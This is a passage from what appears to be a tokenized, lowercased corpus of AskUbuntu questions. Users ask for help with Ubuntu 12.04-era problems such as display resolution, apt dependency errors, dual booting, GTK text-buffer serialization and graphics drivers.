add_page ( self , pages = none , label = none ) : if pages is none : pages = self.get_pages ( ) if label is none : label = `` new page '' textview = gtk.textview ( ) textbuffer = textview.get_buffer ( ) pages.append_page ( textview , gtk.label ( label ) ) self.window.show_all ( ) def add_subject ( self , label = none ) : if label is none : label = `` new subject '' pages = gtk.notebook ( ) pages.set_tab_pos ( gtk.positiontype.right ) pages.set_scrollable ( true ) self.add_page ( pages ) self.subjects.append_page ( pages , gtk.label ( label ) ) self.window.show_all ( ) what do i need to do to resolve this error ?
183000	what are the differences between different releases of ubuntu ?	for example , what is the difference between ubuntu 11.10 and 12.04 lts ? what are some major/minor changes between the two versions ?
183006	monitor not being correctly detected , restricting screen resolution	i have just updated to 12.04 and i have only one choice of screen resolution now , and it is incorrect ( 1024x768 ) . i believe the correct resolution for my display is 1366 x 768 . it is on an acer aspire 5338 with intel gma 4500m graphics . in the diplays window , it is detecting my display as simply 'laptop ' . when i first restarted after the upgrade the screen was scrambled , so i had to restart in recovery mode and select 'run in failsafe graphic mode ' , which solved the scrambled screen problem . running the command xrandr gives : xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* in system details , it is reporting the following : graphics : vesa intel ( r ) cantiga graphics driver : vesa intel ( r ) cantiga graphics experience : standard any help would be gratefully received as it is driving me mad trying to resolve it .
183007	how to fix `` duplicate sources.list entry '' warning ?	every time i try to do some update ( sudo apt-get update ) it says : reading package lists ... ready w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ need /partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ need /partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you have to run apt-get update to correct these problems sources.list : http : //paste.ubuntu.com/1180190/ ls /etc/apt/sources.list.d/ as requested : milton @ milton-huronriver-platform : ~ $ ls /etc/apt/sources.list.d/ emesene-team-emesene-stable-precise.list precise-partner.list precise-partner.list.save upubuntu-com-chat-precise.list upubuntu-com-chat-precise.list.save
183010	apt-get : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution )	root @ m-laptop : /home/m/desktop # apt-get -f install libc6 reading package lists ... done building dependency tree reading state information ... done libc6 is already the newest version . libc6 set to manually installed . you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : virtualbox-4.1 : depends : libc6 ( > = 2.11 ) but 2.9-4ubuntu6 is to be installed depends : libcurl3 ( > = 7.16.2-1 ) but it is not installable depends : libpython2.7 ( > = 2.7 ) but it is not installable depends : libqt4-network ( > = 4:4.5.3 ) but it is not installable depends : libqt4-opengl ( > = 4:4.7.2 ) but it is not installable depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but it is not installable depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but it is not installable depends : libssl1.0.0 ( > = 1.0.0 ) but it is not installable depends : libstdc++6 ( > = 4.6 ) but 4.3.3-5ubuntu4 is to be installed depends : libxml2 ( > = 2.7.4 ) but 2.6.32.dfsg-5ubuntu4 is to be installed recommends : libsdl-ttf2.0-0 but it is not installable recommends : dkms but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ m-laptop : /home/m/desktop # i ran the command earlier as : dpkg -i virtualbox-4.1_4.1.18-78361_ubuntu_oneiric_i386.deb and was trying to install vbox in 9.04
183024	why libreoffice keeps saying the document is locked for editing ?	i created file linuxnotes.odt some time ago and yesterday i edited that same file at my work place and i was in guest account when i edited that file . now whenever i open that file any where else ubuntu slap me with document in use error message . what 's the cause ?
183029	problem serialising textbuffer	while trying to follow the serialisation instructions from this answer i encountered a few problems . the following is supposed to serialise a textarea 's content to a string . the first two line complete fine , however i have problems from then onwards . page_content = subject_content.get_nth_page ( pn ) //textarea widget returned page_name = subject_content.get_tab_label ( page_content ) .get_text ( ) c_buffer = page_content.get_buffer ( ) c_format = c_buffer.register_serialize_tagset ( ) serial = c_buffer.serialize ( c_format , c_buffer.get_start_iter ( ) , c_buffer.get_end_iter ( ) ) the first error i get is : traceback ( most recent call last ) : file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 251 , in on_btn_save_clicked self.save ( ) file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 160 , in save c_format = c_buffer.register_serialize_tagset ( ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) typeerror : register_serialize_tagset ( ) takes exactly 2 arguments ( 1 given ) when inserting none as a parameter to c_format = c_buffer.register_serialize_tagset ( ) that line completes , however the next one does n't work : traceback ( most recent call last ) : file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 251 , in on_btn_save_clicked self.save ( ) file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 161 , in save serial = c_buffer.serialize ( c_format , c_buffer.get_start_iter ( ) , c_buffer.get_end_iter ( ) ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) typeerror : serialize ( ) takes exactly 5 arguments ( 4 given ) i have no idea of a workaround for that , however i should n't have to fill none in that other function in the first place . what is happening here ?
183030	can not resolve package dependencies following lts upgrade from lucid to precise	after a failed lts upgrade from lucid to precise , i 'm stuck in package limbo . as root i have run dpkg -- configure -a apt-get -f install outputs appended below . the default package archive at this point contains packages for precise . what should i do to get past this ? -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- in response to : dpkg -- configure -a dpkg : dependency problems prevent configuration of xserver-xorg-video-vmware : xserver-xorg-video-vmware depends on libxatracker1 ; however : package libxatracker1 is not installed . dpkg : dependency problems prevent configuration of xserver-xorg-video-intel : xserver-xorg-video-intel depends on libxcb-dri2-0 ; however : package libxcb-dri2-0 is not installed . xserver-xorg-video-intel depends on libxcb-util0 ( > = 0.3.8 ) ; however : package libxcb-util0 is not installed . errors were encountered while processing : xserver-xorg-video-vmware xserver-xorg-video-intel in response to : apt-get -f install reading package lists ... building dependency tree ... reading state information ... correcting dependencies ... failed . the following packages have unmet dependencies : gvfs-bin : depends : gvfs ( = 1.6.1-0ubuntu1build1 ) but 1.12.1-0ubuntu1 is installed gvfs-fuse : depends : libgvfscommon0 ( > = 1.1.7 ) but it is not installable depends : gvfs ( = 1.6.1-0ubuntu1build1 ) but 1.12.1-0ubuntu1 is installed initramfs-tools : depends : initramfs-tools-bin ( = 0.92bubuntu78 ) but 0.99ubuntu13 is installed libglib2.0-0-dbg : depends : libglib2.0-0 ( = 2.24.1-0ubuntu1 ) but 2.32.3-0ubuntu1 is installed libglib2.0-dev : depends : libglib2.0-0 ( = 2.24.1-0ubuntu1 ) but 2.32.3-0ubuntu1 is installed libnih1 : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10 is installed plymouth : depends : libdrm-nouveau1 ( > = 2.4.11-1ubuntu1~ ) but it is not installable python-louis : depends : liblouis0 ( > = 1.7.0-2 ) but it is not installable xserver-xorg-video-all : depends : xserver-xorg-video-nv but it is not installable depends : xserver-xorg-video-v4l but it is not installable xserver-xorg-video-intel : depends : libxcb-dri2-0 but it is not installed depends : libxcb-util0 ( > = 0.3.8 ) but it is not installed xserver-xorg-video-vmware : depends : libxatracker1 but it is not installed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
183032	movie maker **simple** alternative	is there an alternative program in ubuntu for microsoft movie maker ? what i ( ..well.. my girlfriend.. ) need is not something for multi-track , hd , dv import , blur effects , etc ... but something to e.g . add rotating funny textual effects , `` stars of light '' , transitional effects ... i think you get the idea ; - )
183035	how to disable displayinfo for intel i810 when there is no xorg.conf ?	i 'm testing 12.04 on an office desktop . this machine has an integrated intel i810 . this very machine used to run ubuntu ( or kubuntu ) quite well , until the natty narwhal release , when the x server started freezing . this seems to be caused by an issue with a call to the video bios , which can be circumvented by disabling the option displayinfo . i tried creating an xorg.conf by using xorg -configure , but it produced an error after trying to make a file . i did have a file , and i put it in /etc/x11 with displayinfo false ( maybe it wants `` disabled '' ? ) , but it would n't boot at all until i removed that xorg.conf . there is no 10-monitor.conf file either . all i want to do is set the appropriate option so that my intel display does n't freeze . is there any other way i can disable the displayinfo ?
183036	can not install skype	evey time i try to install skype it says : reading package lists ... ready building dependency tree reading state information ... ready the package skype-bin : i386 is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . e : malformed line 60 in source list / etc / apt / sources.list ( distribution analysis ) e : the list of sources could not be read
183044	pdflatex reads .eps files saved in os/x , but not in ubuntu	sorry if this is a stupid question ; i 'm a newbie . i am preparing a manuscript in latex . the journal ( physical biology , an iop publication ) requires that figures be saved in .eps format , so i am trying to do that . however , i can not get my latex file to build when i have generated the .eps files on my ubuntu computer . if i save the images on my mac , the file build just fine . so far , i have tried saving images in imagej , fiji and inkscape . the same problem occurs in all three . when using kile , i get the following error : /usr/share/texmf-texlive/tex/latex/oberdiek/epstopdf-base.sty:0 : shell escape feature is not enabled . in texworks , the error is different , but still there : package pdftex.def error : file `./figures4/figure4a-eps-converted-to.pdf ' not found . now , if i fire up inkscape , fiji or imagej on os/x , everything works fine . the mac also ca n't build with the ubuntu-saved images . the images generated on the ubuntu machine open fine using document viewer . i am building the same latex file on both computers , with the exact same results . the header of my latex file is : \documentclass [ 12pt ] { iopart } \usepackage { graphicx } \usepackage { epstopdf } \usepackage { parskip } \usepackage { color } \usepackage { iopams } and then the code for the figure is : \begin { figure } \center { \includegraphics [ width=4in ] { ./figures4/figure4a.eps } } \footnotesize { \caption { \label { fig:4a } ( 4a ) lorem ipsum dolor sic amet . } } \end { figure } i 'd be happy to send an example of both .eps files . again , sorry if this is a dumb question . i tried everything i could think of before posting here . thanks , david
183047	purpose of .dir , .install files in packages	when packaging ubuntu packages , there 's always these funny .dir and .install files around . i suppose their purpose is to somehow indicate what files are to be installed , but i 'm not so sure about what the the format of those files is , nor what the consequences are when they are omitted .
183050	which driver to install for ati es1000 graphic card ?	i am installing 12.04 on an ibm x3250 m2 server . it has an ati es1000 with no acceleration ( that does not bother me , we do n't need it ) , we use it to connect remotely via freenx . freenx works fine , ( except than in windows 7 machines nx client shows only icons and no text ) but the only resolution i can get in the monitor directly attached to the server is 800x600 . the display manager also shows me two monitors , the real one and one ibm 15 '' . which driver should i install ? . it seems that the ati driver that comes with ubuntu does not work properly . any help will be appreciated .
183051	running a program on boot without login , using the screen	preface : i have a server running on an old laptop . the screen is always on with a login prompt , but because its keyboard is in pretty bad shape , i use it exclusively via ssh . the screen is in a good position , though ; i want to use it to display a clock and some stats about what my server is doing . i have scripts to display all those things , but i want to always show them on the monitor screen . my question is , how do i get my script ( called hud ) to run on /dev/tty1 , instead of the login prompt . hopefully , it should be possible to accept keyboard input as well as display its output , so that it can use the keyboard to show more info where needed in a future version . i 'd also like tty2 etc . to remain active as login screens , in face i actually do need to login locally . for a start , i tried creating a script that i can run from ssh to start the hud . it goes something like this : ( flock -n 9 watch -- interval 0.2 -- precise -- color -- notitle -- exec /path/to/script & disown ) 9 > /var/lock/hud > /dev/tty1 2 > /dev/tty1 < /dev/tty1 ( i had to use & disown instead of nohup because nohup recognized the tty and redirects output to nohup.out instead . ) this sort-of works . however , it has a few issues : it does n't steal the terminal 's keyboard input , so you ca n't ctrl+c to get out of it ( nor change the script to actually use the keyboard input ) , and if you press enter it show it and scrolls the display , never refreshing it correctly afterwards . oddly , if i disconnect the ssh session which created it , it stops working and shows a message : exec : no such file or directory . if i reconnect to ssh , it resumes functioning properly . it feels hackish . is there a better way to do this ? how ?
183056	virtualbox share permissions	at the moment i 'm running ubuntu server 12.04 on top of a virtualbox running as service in microsoft windows7 x64 . i 've configured the shares on fstab with e /media/e vboxsf auto , rw , uid=1000 , gid=1000 0 0 the mount is ok drwxrwxrwx 1 knoker knoker 16384 sep 1 20:02 e but i cant change the permissions inside of /media/e , chmod runs but does n't do nothing . on a specific case /media/e/docs/downloads i have dr-xr-xr-x 1 knoker knoker 163840 sep 1 19:30 downloads and since i ca n't seem to be able to change from linux , i tried it on the windows , and all users listed have full control . any ideas on what is happening ?
183060	install windows7 side by side with ubuntu 12.04	i had a windows os on my machine . one time , when i tried installing kubuntu 12.04 , i messed up the whole computer and it would n't boot up anymore . so , i installed ubuntu 12.04 from a usb drive and it worked . now , i need windows for my school work . so , i wanted to ask if i can install windows 7 without deleting ubuntu 12.04 and how do i install it ?
183061	how do i get usb sound working on a dell dimension 5000 ?	i have recently installed 12.04 lts on a dell dimension 5000 from a usb with the disk image . it is a fresh install , and from the off , i noticed that the sound was not working . i kinda expected this , but i have minor knowledge of ubuntu and all the forum post replies seem to be tailored to the asker ( i.e their details are asked for and the solution is found from that . what can i do to get sound ?
183063	no option to boot ubuntu in a dual-boot system	i installed the latest version of ubuntu on my vaio laptop to use windows 7 and ubuntu at the same time . i chose the option said `` install ubuntu alongside windows 7 '' . after finishing the installation , my system was restarted and it boots and starts up with windows . in other words , i do not have the ubuntu option . what should i do ? i appreciate your help .
183064	how to update bios after ram change - dell inspiron 1420 - linux mint 13	i have a dell inspiron 1420 with linux mint 13 on it ( ubuntu 12.11 i think ) . i have two sticks of ram 1gb each . today , i have changed one for a 2gb one . on boot , bios noticed ram change and redirect me to bios setup - to change settings so system knows ram has changed . could n't find out how to do it so resume normal boot . running free -m shows me mem : 992 which means the new ram stick of 2gb has not be recognized and mint is running with only 1gb of ram . on dell website found instructions on how to update the bios but it requires windows . i have also check the linux.dell.com web site but it does not support debian yet . right now i am installing windows on virtualbox but anyone knows how to do it from mint ? thanks !
183065	why do n't i have permission to read files on the cd i bought ?	i recently bought this book , which came with an accompanying cd . when i try to view the contents of the cd in ubuntu , i do n't have read permission for any of the files . ls -al in the root of the cd gives this : dr-x -- -- -- 1 mpiroc mpiroc 4096 sep 21 2011 ./ drwxr-xr-x 3 root root 4096 sep 1 18:23 ../ -- -xr-sr -- 1 mpiroc mpiroc 3799 sep 14 2011 advanced-content-and-appe.html* -- -xr-sr -- 1 mpiroc mpiroc 24 sep 20 2008 autorun.bat* -- w -- -s -- - 1 mpiroc mpiroc 48 may 18 2004 autorun.inf -- w -- -s -- - 1 mpiroc mpiroc 12344 may 14 2004 cd-small.bmp -- w -- -s -- - 1 mpiroc mpiroc 4090 sep 14 2011 historical-perspectives-a.html dr-x -- -- -- 1 mpiroc mpiroc 2048 sep 6 2011 images/ -- w -- -s -- - 1 mpiroc mpiroc 1798 sep 14 2011 index.html -- w -- -s -- - 1 mpiroc mpiroc 5990 sep 15 2011 readme.txt dr-x -- -- -- 1 mpiroc mpiroc 2048 sep 6 2011 resources/ dr-x -- -- -- 1 mpiroc mpiroc 2048 sep 6 2011 search/ -- w -- -s -- - 1 mpiroc mpiroc 4098 sep 14 2011 search.html -- w -- -s -- - 1 mpiroc mpiroc 7801 sep 14 2011 software.html dr-x -- -- -- 1 mpiroc mpiroc 2048 sep 6 2011 styles/ -- w -- -s -- - 1 mpiroc mpiroc 5230 sep 14 2011 tutorials.html -- w -- -s -- - 1 mpiroc mpiroc 8138 sep 15 2011 using-this-cd.html i must be doing something wrong -- surely the cd is meant to be read ! what am i missing here ?
183068	console output mixed with x screen after 12.04 upgrade	i 've just upgraded from 11.10 to 12.04 and i 'm seeing console output on my x screen . it 's not legible but sometimes i can even see the cursor blinking . i 'm also running a multi-seat system and i see garbage on the screen when someone types on the second keyboard as well . clicking on the screen erases the garbage console output but it comes right back when someone starts typing . xorg.conf section `` serverlayout '' identifier `` desktop '' screen 0 `` desktopscreen '' 0 0 inputdevice `` desktopmouse '' `` corepointer '' inputdevice `` desktopkeyboard '' `` corekeyboard '' option `` autoadddevices '' `` false '' option `` allowemptyinput '' `` true '' option `` autoenabledevices '' `` false '' endsection section `` serverlayout '' identifier `` desktop2 '' screen 1 `` desktop2screen '' 0 0 inputdevice `` desktop2mouse '' `` corepointer '' inputdevice `` desktop2keyboard '' `` corekeyboard '' option `` autoadddevices '' `` false '' option `` allowemptyinput '' `` true '' option `` autoenabledevices '' `` false '' endsection section `` module '' load `` dbe '' load `` extmod '' load `` type1 '' load `` freetype '' load `` glx '' endsection section `` files '' endsection section `` serverflags '' option `` autoadddevices '' `` false '' option `` autoenabledevices '' `` false '' option `` allowmouseopenfail '' `` on '' option `` allowemptyinput '' `` on '' option `` zapwarning '' `` on '' option `` handlesepcialkeys '' `` off '' # zapping on option `` dri2 '' `` on '' option `` xinerama '' `` 0 '' endsection # desktop mouse section `` inputdevice '' identifier `` desktopmouse '' driver `` evdev '' option `` device '' `` /dev/input/event3 '' option `` protocol '' `` auto '' option `` grabdevice '' `` on '' option `` emulate3buttons '' `` no '' option `` buttons '' `` 5 '' option `` zaxismapping '' `` 4 5 '' option `` sendcoreevents '' `` true '' endsection # desktop2 mouse section `` inputdevice '' identifier `` desktop2mouse '' driver `` evdev '' option `` device '' `` /dev/input/event5 '' option `` protocol '' `` auto '' option `` grabdevice '' `` on '' option `` emulate3buttons '' `` no '' option `` buttons '' `` 5 '' option `` zaxismapping '' `` 4 5 '' option `` sendcoreevents '' `` true '' endsection section `` inputdevice '' identifier `` desktopkeyboard '' driver `` evdev '' option `` device '' `` /dev/input/event4 '' option `` xkbrules '' `` xorg '' option `` xkbmodel '' `` 105 '' option `` xkblayout '' `` us '' option `` protocol '' `` standard '' endsection section `` inputdevice '' identifier `` desktop2keyboard '' driver `` evdev '' option `` device '' `` /dev/input/event14 '' option `` xkbrules '' `` xorg '' option `` xkbmodel '' `` 105 '' option `` xkblayout '' `` us '' option `` protocol '' `` standard '' endsection section `` monitor '' identifier `` desktop2monitor '' vendorname `` acer '' modelname `` acer g235h '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` desktopmonitor '' vendorname `` acer '' modelname `` acer h213h '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` evgacard '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 560 ti '' option `` coolbits '' `` 1 '' busid `` pci:2:0:0 '' screen 0 endsection section `` device '' identifier `` xfxcard '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 9800 '' option `` coolbits '' `` 1 '' busid `` pci:5:0:0 '' screen 0 endsection section `` screen '' identifier `` desktopscreen '' device `` evgacard '' monitor `` desktopmonitor '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` desktop2screen '' device `` xfxcard '' monitor `` desktop2monitor '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection lightdm.conf [ seatdefaults ] greeter-session=unity-greeter # greeter-session=lightdm-razor-greeter user-session=ubuntu xserver-allow-tcp=false xserver-pass-seat-name=true greeter-pass-seat-id=true [ seat:0 ] xserver-layout=desktop xserver-command=/usr/bin/x :0 -layout desktop -auth /var/run/lightdm/root/:0 -nolisten tcp vt8 -novtswitch -sharevts -background none [ seat:1 ] xserver-layout=desktop2 xserver-command=/usr/bin/x :1 -layout desktop2 -auth /var/run/lightdm/root/:1 -nolisten tcp vt9 -novtswitch -sharevts .
183071	unresolvable problem .. initializing .. package information [ wine ppa ]	why do i keep receiving this error message ? how can i fix this problem ? could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 2 in source list /etc/apt/sources.list.d/ubuntu-wine-ppa-precise.list'
183075	determine the correct repository to add for a specific package	i 'd like to install https : //launchpad.net/ubuntu/+source/gnome-do/0.9-1build1 using package-manager/apt-get . how can i determine which repository to add to install this ?
183076	nvidia gl 650m on dell inspiron n7720 with ubuntu 12.04	i want to get 3d acceleration on my laptop , but the `` additional drivers '' tool does n't give me any results . i have tried installing the `` nvidia-current '' package . after doing this , i fired up minecraft just to test it , and got this exception : org.lwjgl.lwjglexception : could not init glx what is happening here ? how can i get 3d acceleration ?
183078	how to upgrade libexttextcat-data	sudo apt-get upgrade los siguientes paquetes se han retenido : libexttextcat-data 0 actualizados , 0 se instalarรกn , 0 para eliminar y 1 no actualizados . cualquier ayuda . gracias
183079	how can i configure my system to use twinview correctly ?	story : i have a hp dv7 1020us with a nvidia geforce 9600m gt . my internal monitor is broken , so essentially i cant ' use it , as i can hardly see anything through it . recently , i upgraded to ubuntu 12.10 ( manually , using synaptic to upgrade packages bit by bit ) , and after getting most of the system upgraded , i decided to go for the new kernel , x , and nvidia-drivers . unfortunately , it seems that something , whether xrandr , or the nvidia driver , is reading my external monitor incorrectly . nvidia settings is not allowing me to clone the screen as it did before ( i have it set to clone , but it acts as if i have two separate screens ) . lightdm only shows on the internal screen , which is not useful because although i can login , i ca n't actually see what i 'm gdoing . xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.37 ( buildd @ batsu ) tue aug 28 15:15:30 utc 2012 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.43 ( buildmeister @ swio-display-x86-rhel47-13 ) sun aug 19 21:19:28 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` lpl '' horizsync 30.0 - 75.0 vertrefresh 59.9 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9600m gt '' endsection section `` screen '' # removed option `` nvidiaxineramainfoorder '' `` dfp-0 '' # removed option `` metamodes '' `` dfp : nvidia-auto-select +0+0 , crt : 1440x900 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 , crt : 1440x900 +0+0 '' subsection `` display '' depth 24 endsubsection endsection nvidia-settings : unity : with cloning on , this is what i get : this is likely a bug in unity , but as i ca n't switch sessions on login , i ca n't be sure : ) ! ( woo hoo ! ) xrandr output : xrandr screen 0 : minimum 8 x 8 , current 1280 x 1024 , maximum 8192 x 8192 vga-0 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 320mm x 240mm 1024x768 85.0 + 75.0 1280x1024 60.0* 800x600 85.1 75.0 640x480 85.0 75.0 59.9 lvds-0 connected ( normal left inverted right x axis y axis ) 1440x900 59.9 + hdmi-0 disconnected ( normal left inverted right x axis y axis ) my monitor : my monitor is a compaq 7500 crt monitor . google searching says that the max res is indeed 1280x1024 , but i have used it at 1440x900 for over a year now - so yes , it can achieve the laptop 's resolution . i think the problem is that it is being reported as the wrong kind of monitor : this is incorrect , as it is a 17 '' monitor , and it supports way more resolution options that it 's displaying . now , what can i do to at least work around these issues ( i know i need to report a bug or two , but i need to get this fixed as well ) and force my monitor to correct resolution ? p.s . i created a topic for this on the ubuntu forums ( it 's just a merry go round , so i came here as a last resort ) . the suggestion i got is to downgrade to the 295.xx driver - but because of the way nvidia 's driver has to be installed , i do n't think this is an option unless there is a graphical way to do this . you see , if i switch to a tty ( required for installing ) , the crt is disabled . current situation : i have disabled the laptop screen and written the changes to the xorg.conf . adding 1440x900 as a meta mode made no difference , because the monitor is still being detected incorrectly . it seems i need the right edid for this crt . anyway . right now , what i would like to do is to have lightdm use the correct resolution on login ( at least 1280x1024 ) . how can change at least this setting ?
183086	java not recognized as default application	i just installed java according to this article , and java -version displays java version `` 1.7.0_07 '' java ( tm ) se runtime environment ( build 1.7.0_07-b10 ) java hotspot ( tm ) 64-bit server vm ( build 23.3-b01 , mixed mode ) update-alternatives -- config java ' returns this : there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/bin/gij-4.6 1046 auto mode 1 /usr/bin/gij-4.6 1046 manual mode * 2 /usr/local/java/jdk1.7.0_07/bin/java 1 manual mode press enter to keep the current choice [ * ] , or type selection number : with update-alternatives -- config javac ( or javaws ) returning similarly . however java is n't listed in the default applications menu when i click on a .jar file and go to `` open with application '' . i tried to install java this way , and on the update-alternatives part of the command returned me : /etc/alternatives/ [ java , javac , javaws ] is dangling , it will be updated with best choice i just confirmed that i can use java , as java -jar file.jar does work . just figured that i 'd mention it , do n't know why i did n't before , but when i right click on a .jar file , java 7 run-time is n't even listed there , it seems that the file manager is n't recognizing it as a program , but it is there , and it does work ... cause of the problem after much experimenting , and research , i 've found the cause of the problem - a missing .desktop file in /usr/share/applications . i 've posted an answer that you can use to manually create an entry , but as stated it is n't recomended as i 'm sure that there 's a better way to do it .
183089	default program for opening .pro qt project files	i would like to set qt creator ( the one which is in the nokia qt sdk , not the one in canonical ppas ) as the default program to open .pro qt project files . but it appears that my ubuntu install ( 12.04 while i am writing the question ) recognizes .pro files as plain text files instead of qt project files . i know that i could fix the problem by setting qt creator as the default program for opening plain text files but i want to keep on opening plain text files with the program i currently use for this ( gedit ) . so my question is : how can i do for making my ubuntu install recognizing .pro files as qt project files instead of plain text files ? nb : i have already looked at ubuntu tweak to associate qt project files with qt creator but i did not find anything relevant ( perhaps i missed it too ) . edit : the solution is in the edit of kalle elmăšr 's answer .
183092	booting problems with windows 8	http : //paste.ubuntu.com/1180571/ here is the url i was told to paste by way of asking for help after boot repair failed to resolve my problem . that problem , quite simply , is that i can not boot ubuntu even though i installed it on a spare partition ( close to 450 gigabytes ) .
183093	sudo arguments not working	flags/arguments to sudo on my system are n't working . peter @ sirius : ~ $ sudo -h env : -h : no such file or directory peter @ sirius : ~ $ sudo -u postgres env : -u : no such file or directory however , executables in sudo 's path work fine . my problem is not being removed from the admin group , or having a corrupted /etc/sudoers file . reinstalling sudo did not fix it , either -- http : //askubuntu.com/a/46459/42720 recently upgraded to 12.04 ; no other problems with the upgrade . any ideas ? thanks
183094	how to install getlibs	i 'm trying to follow this answer to install tweetdeck 0.38.2 on ubuntu 12.04 . the problem is , the website they link to for downloading getlibs , has been deleted by the host . i was wondering if anyone knew of an alternate download link , or another way to install getlibs ?
183097	where is nautilus icon file located and how is it chosen ?	when i plug my garmin nuvi 265 gps device into my computer via a usb cable , it mounts as a drive with a blue triangle icon instead of the default gray hard drive icon . how does nautilus know how to do this ? after much laborious searching , i found that the icon info is stored in ~/.gconf/apps/nautilus/desktop-metadata/garmin @ 46 @ volume/gconf.xml -- but only when a custom icon is selected . so where is this blue icon file ? why does nautilus use it instead of the plain drive icon ? is there a way to have give each of my drives a custom icon -- so that when i stick in my various flash drives , they have a distinctive icon ( i.e . a 'favicon.ico ' file on root or such ? ) using gnome 2.30.2 on ubuntu 10.04 .
183098	how can i prevent window title from appearing in the top panel ?	i want to keep the global menu ( actually prefer it ) i 've disabled auto-hide and the menu is always there , but when the window is not maximized , a chunk of the title is visible in the corner . i know it 's a small matter , but i find it very annoying . is there any way to remove the window title from the panel ? any help appreciated
183099	ubuntu not booting properly	i just bought an asus eeepc with ubuntu 12.04 installed on it . after turning it on and performing the updates it did n't boot properly and showed a screen saying it was working on low graphics mode , but i was n't able to get to the gui . after some searching , i tried renaming xorg.conf.failsafe to xorg.conf using the mv command . after rebooting i got to the ubuntu gui but it was stuck to a 800x600 resolution , track pad not working and not detecting my wi-fi . after rebooting again it goes straight to console tty1 . i 'm completely new to ubuntu and linux . if some one can give help ? i think the best would probably be to reinstall it from scratch , but i do n't know how .
183100	installation of ubuntu	i 'm trying the option of `` try-ubuntu-before-you-install '' i 've burned the iso file onto a cd , told the laptop to boot from cd first , but it ignores the cd and boots the old xp from the hdd . any ideas ?
183104	how can i install mysql along with phpmyadmin ?	i installed php5 from the software-center and it came along with apache2 . how can i install mysql database along with phpmyadmin ?
183105	updating fglrx driver fails & deactivates fglrx driver	i have an ati/amd graphics card in my computer . however , every time i try to install the post-release updates , it always fails and deactivates the graphics driver . i 've pasted the last few messages following the ldconfig deferred processing now taking place message from the installation log from /var/log/jockey.log below ; if you 're interested , i have pasted the full output here . warning : /sys/module/fglrx_updates/drivers does not exist , can not rebind fglrx_updates driver debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt 